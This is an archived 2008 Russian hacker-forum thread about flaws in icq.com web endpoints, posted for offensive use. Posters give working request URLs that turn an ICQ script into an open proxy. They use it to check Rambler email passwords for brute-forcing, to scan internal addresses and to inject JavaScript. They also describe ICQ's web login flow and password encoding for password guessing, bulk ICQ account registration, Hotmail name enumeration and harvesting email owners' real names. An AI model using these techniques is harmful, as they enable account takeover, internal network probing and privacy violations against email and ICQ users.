Некоторые баги Icq.com [Архив]

Просмотр полной версии : Некоторые баги Icq.com

КВР

02.06.2008, 16:47

К сути вопроса.

http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=521338
[php]
так показывает ошибку 404
[php]
https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=521338

Так запрос выполняется нормально.
если выдаёт 1 то логин пасс верные если нет то 0.
таким образом можно написать брутфорсер.
Скрипт:

https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=

является сам по себе вэб прокси сервером.
Те переходя по ссылке https://ips.icq.com/
мы емеем 404.

https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=https://ips.icq.com

Всё ок.Нету форбиден.
можно проскалитть локалку

https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://192.168.0.1

и так далее.

Можно приинклудить джава скрипт.

https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=УРЛ_С_ДЖАВА_С� �РИПТОМ

Ccылка на исходьник скрипта.

http://webfile.ru/1990419

Web-defence.ru

КВР

02.06.2008, 19:42

вот например красивий запрос

https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://localhost

недавно розберал авторизацию на icq2go
то
после просмотра старого и доброго webicq я нашел метод авторизацеи
суть ево полягает в том что для начала мы берем сесию вот отсюда

http://bhm.icq.com/hello?locale=en&clver=8003&clid=Wicked%5FTester&trans=1001&event=1500&%5F%5FiClient=%5Bobject%20Object%5D

и получаем в ответ event=1510&session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df %2ddeae33557a14&trans=1001&server=64%2e12%2e202%2e137&port=80&?

2021799010%2dc754d546%2d2a05%2d4e44%2d89df%2ddeae3 3557a14- самая сесия
64.12.202.137 - адрес сервера

и когда мы узнали нашу сесию делаем запрос

http://64.12.202.137/data?session=2021799010%2dc754d546%2d2a05%2d4e44%2 d89df%2ddeae33557a14&isicqemail=0&pass=DEDHFKDIHCFDGFHI&enc=1&status=0&sn=489801534&trans=1001&event=2000&%5F%5FiClient=%5Bobject%20Object%5D

обратите внимания на пароль!
пароль шифруеться, 1 символ заменяеться на 2
в файле char я привел почти все символи етой шифровкой !

если ответ мы получаем

event=2010&session=2021799010%2dc754d546%2d2a05%2d4e44%2d89df %2ddeae33557a14&trans=1001&skey=713969121&sn=489801534&epass=1EGEJGMEKIEGFHHIK&?

значит пароль подошел

event=2010 - означает что пароль удачный
event=1000 - неправельный пароль

satana8920

02.06.2008, 19:52

ChaaK мдяяяя
а вот еси я айсику брутер хочу написать вот для таких как ты блин?
что б проверялись парлли по HTTP

КВР

02.06.2008, 20:04

Хоть кто-то понял тему.

heks

04.06.2008, 18:29

И к чему это??
Простые методы узнавания правильный ли пароль. Нету тут багов, по крайней мере не встретилось.

А чо 302 ошибка уже не в моде?
опиши что за 302 ошибка

Piflit

04.06.2008, 18:50

http://www.checkupdown.com/status/E302.html

maxster

04.06.2008, 19:18

набрасал на скорую руку скрипт для брута мыльников, через первую багу, если кому надо берите
http://dump.ru/file_catalog/417927

devton

05.06.2008, 20:04

бага шЫкарная
брут рамблер мыл с малым трафиком - штука крайне полезная

НО есть еще 1 применение первому урлу(https://www.icq.com/xtraz2/products/coreg/php/check_lsp_details.php?url=http://id.rambler.ru/script/reg.cgi&username=xspider1@rambler.ru&password=521338 )

открываем в бровзере и видим введенные при регистрации мыльника фамилию и имя владельца рамблер-мыла

я ввел в гугле mailto "@rambler." , проверил мыльники етим скриптом. Похоже, народ указывает в значительной части случаев реальные имя-фамилию :)

КВР

09.06.2008, 14:56

Возможность "Авто-рега" icq номеров.

http://icq.atlas.cz/ClientRegistration/default.aspx?connectorId=_icqFlashConnector&validateAtlasUser=1

пост даные

uin=365286171&key=B800E649B65799290C6033C4BDF566FF13B2ECE3CFE9A6 CC9894A243B7E3D27328EE6C733AFC0CC520BB63F2A2F3B5F6 9CE298085E0EC2630EBB64F30009B46F98CD9FB976F6108797 E5C5379824360CD653D1821270739CF55DFA9D094E9F8D&password=a8n5xz&data=%3Cdata%3E%3Cfname%3E%3C%2Ffname%3E%3Clname%3 E%3C%2Flname%3E%3CbYear%3E0%3C%2FbYear%3E%3CbMonth %3E0%3C%2FbMonth%3E%3CbDay%3E0%3C%2FbDay%3E%3Cgend er%3E0%3C%2Fgender%3E%3Ccountry%3E-1%3C%2Fcountry%3E%3Ccity%3E%3C%2Fcity%3E%3Cstate%3 E%3C%2Fstate%3E%3Ckey%3EB800E649B65799290C6033C4BD F566FF13B2ECE3CFE9A6CC9894A243B7E3D27328EE6C733AFC 0CC520BB63F2A2F3B5F69CE298085E0EC2630EBB64F30009B4 6F98CD9FB976F6108797E5C5379824360CD653D1821270739C F55DFA9D094E9F8D%3C%2Fkey%3E%3Cuin%3E365286171%3C% 2Fuin%3E%3Cpassword%3Ea8n5xz%3C%2Fpassword%3E%3Cem ail%3E%3C%2Femail%3E%3Cnickname%3Exspider3%3C%2Fni ckname%3E%3Cquestion%3EN%C3%A1zev+obl%C3%ADben%C3% A9+po%C4%8D%C3%ADta%C4%8Dov%C3%A9+hry%3F%3C%2Fques tion%3E%3Canswer%3Exspider+fghfgjhhg%3C%2Fanswer%3 E%3CauthorizeAdd%3E%3C%2FauthorizeAdd%3E%3Cauthori zeStatus%3E1%3C%2FauthorizeStatus%3E%3CrememberPas s%3E1%3C%2FrememberPass%3E%3C%2Fdata%3E&username=<login>

нотмаил.ком чек на свободные мыла

https://signup.live.com/nexus.fpp?cnmn=Microsoft.Msn.MemberExperience.Nexu s.NexusService.CheckAvailability&ptid=0&a=f9869bdc-a627-4a1e-8c06-f0f1b88923cf

пост запрос
cn=Microsoft.Msn.MemberExperience.Nexus.NexusServi ce&mn=CheckAvailability&d=[%22<login>%40<domain>%22],%22f9869bdc-a627-4a1e-8c06-f0f1b88923cf%22&v=1

если ответ 1006 знач мыло свободное

Web-Defence.ru